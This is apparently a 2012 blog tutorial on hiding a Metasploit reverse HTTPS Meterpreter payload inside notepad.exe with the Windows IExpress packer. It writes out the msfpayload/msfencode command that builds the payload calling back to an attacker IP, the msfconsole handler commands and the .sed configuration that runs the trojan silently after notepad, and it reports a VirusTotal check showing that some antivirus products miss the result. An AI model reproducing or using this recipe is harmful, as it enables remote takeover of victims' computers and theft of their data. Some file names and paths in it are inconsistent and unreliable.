06/04/2012

Knock Knock Who is There?

Intro

This article was posted to show you how ridiculously easy is to back door any executable of your choice (well almost any) without even knowing how to pronounce the word CoMpUtEr. I call this constructive hacking because you literally construct the Trojan Horse using windows embedded packers without knowing how to program in any programming language, and the best part is that it is not even traceable from almost all if any anti virus software that exist in the market.

The magical wizard

When I say magical wizard I am referring to the IExpress wizard (obviously very well know to the hacking community for a long time now). IExpress wizard exist in almost all windows versions with default installation. You can use the IExpress Wizard and it's command-line options that come with Windows XP, Windows Server 2003, and Windows Vista to simplify the creation of a setup program. Using the IExpress Wizard, you can create self-extracting files that automatically run the setup program that is contained inside. The setup program can be an .inf file or an executable program. IExpress automatically removes the setup files after installation.

Now what is suspicious about that? Of course the fact that you can pack other executable within any of the executable you choose to. The IExpress Wizard can help you carry out installations of your customized browser package, such as determining whether the computer needs to be restarted after installation. You can find the IExpress Wizard (IExpress.exe) in the <systemdrive>:\WINDOWS\system32 folder.

IExpress uses a Self-Extraction Directive (.sed) file to store information about your package. When you run the IExpress Wizard, you can start with an existing .sed file or create a new one by using the wizard. The .sed file contains information and instructions about the setup package.

Running the wizard

A very easy way to start IExpress wizard is by Start --> Run and then type IExpress. If you do that the IExpress wizard window is going to pop up and ask you to follow a flow of next button clicking instructions to achieve your goal. 



Step 1:Running IExpress wizard window looks exactly like that:


Step 2: The following window that appears is this one:

 
Note: Notice that I have marked the software version and clicked on the Create new Self Extraction Directive option, which is the one we are going to use for the purpose of this tutorial.

Step 3: The next step will be to click next and get the next wizard window:
    


Note: This this window we choose Extract file and run an installation command, very important option for our success.

Step 4: And again you can see that the next window asks for a the package title (I choose Evil Notepad):


Step 5: In this part we want a none interactive installation and for that reason I choose No prompt and click to next button:



Step 6: Again we want a none interactive installation (for reducing the user interaction) and for that reason I choose Do not display a license and click to next button:


Step 7: In the following window we can add the executable we want to back door:



We will now stop the process with our wizard and locate the notepad executable which by the way is located in this path %SystemRoot%\system32 notepad.exe we copy the executable to the desired location in order to insert it.


The notepad.exe before our back door

For this tutorial (as already mentioned) we will use the notepad.exe to do the demo. Meaning we will back door the notepad executable and explain how to run it (meaning how to the fool the victim user to install it or simply run the infected executable). But first lets have a look at the properties of the executable we are infecting:


Note: Check the Size property of the file, it is 147 KB. Obviously the size of the notepad.exe after inserting the Trojan executable is going to be increased (or maybe not?).

Generating our Metasploit payload

There is a relatively large amount of tutorials in the internet on how to generate the desired payload using msfpayload utility and an even larger amount of tutorials on how to bypass industry anti virus software. Now according to my opinion the best malicious payload to generate using Metasploit is Windows version of reverse Https Meterpreter shell (meaning of course windows/meterpreter/reverse_https). Reverse Https payloads after being executed establish a reverse HTTPS connection back to attacker's PC (obviously in port 443).

More specificaly reverse Https shell from Metasploit tunnel communication over HTTP using SSL and Inject the meterpreter server DLL via the Reflective Dll Injection payload (which of course is staged).
  
Step 8: We are now going to use msfpayload to generate out desired executable. We cd to /pentest/exploits/framework2 in backtrack and then type ./msfpayload windows/windows/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=443 R| msfencode -t exe -e x86/shikata_ga_nai >> ClickOnMe.exe (I also used an shikata_ga_nai encoding but it is not needed). Boom the executable was generated (named ClickOnMe.exe of course).

The following screen shot shows the options for the specific payload:


The following screen shot shows the generated executable for the specific payload:


If we do now a file ClickMe.exe we will see that is a DOS executable: 



Step 9: Then we start our handler to the attacking PC and insert the executable from our PC to the notepad. So we type:
  1. cd /pentest/exploits/framework3
  2. ./msfconsole  
  3. msf > use exploit/multi/handler
  4. msf exploit(handler)> set PAYLOAD windows/meterpreter/reverse_https
  5. msf exploit(handler)> set LHOST sameIPfromBefore
  6. msf exploit(handler)> set LPORT 443
  7. msf exploit(handler)> exploit -j
Now a handeler is running in the victims PC is listening in port 443 for reverse Https payload. The executable payload is already created so the next step would be to insert the executable to our notepad. 

Inserting the executable into Notepad.exe

Step 10: We now continue from step 7 (having done already step 8 and 9 of course), the wizard waits to add the executable so we add using the button Add:


Note: As you can see both executable files are now added to the packer.

Step 11: The next step would be to install the notepad.exe (in this occasion notepad obviously does not need to be installed) and then execute the ClickOnMe.exe afterward:


Note: In the install program we put notepad.exe and post install we use the Trojan ClickMe.exe.


Note: In the install program we put notepad.exe and post install we use the Trojan ClickMe.exe.



Note: In order to achive a silent installation we choose to use the No message.


Note: Again we choose to save the EvilNotepad.exe to a specific file.





Note: The screen shots above show a series of next clicking to create the package.


The task manger above shows the malicious executable EvilNotepad.exe running. If you do now a left click properties you will see that the size of the file is increased!! even though there was a 44% compression of the package. Further investigating the EvilNotepad.exe will make you see that if you use a tcpmon it will record the Trojan payload attempt to connect back to the attackers PC.

The configuration file (ending in sed and named as EvilNotepad.sed) shows the exact configuration exported:

[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=1
HideExtractAnimation=1
UseLongFileName=1
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=N
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles
[Strings]
InstallPrompt=
DisplayLicense=
FinishMessage=
TargetName=C:\Documents and Settings\trojan\EvilNotepad.exe
FriendlyName=Evil Notepad
AppLaunched=notepad.exe
PostInstallCmd=ClickOnMe.exe
AdminQuietInstCmd=
UserQuietInstCmd=
FILE0="notepad.exe"
FILE1="ClickOnMe.exe"
[SourceFiles]
SourceFiles0=C:\Documents and Settings\jerry\Desktop\
[SourceFiles0]
%FILE0%=
%FILE1%=

Testing it for anti-virus

 After generating the payload we and check the properties of the file we see that the size is 193 KB:


Note: Defeating the notepad change can be achieved by doing multiple integrity checks with appropriate software.

Now the next step to do is to upload it in virus total to see what the anti-virus software can do:

  

Note: As  you can see obviously anti-virus such as Symantec and SUPERAntiSpyware did not detect the malicious payload.


Epilog

I just proved you that even a person that has almost no clue about computers can actually generate an effective Trojan horse and obviously steal your credit card or personal data (maybe a jealousy boyfriend). Imagine someone using the same methodology to generate Trojan horses combined with social engineering through facebook or flicker. I hope I helped you understand the risks.


Reference:

  1. http://technet.microsoft.com/en-us/library/dd346760.aspx 
  2. http://dyn.com/dns/ 
  3. http://www.offensive-security.com/metasploit-unleashed/Msfpayload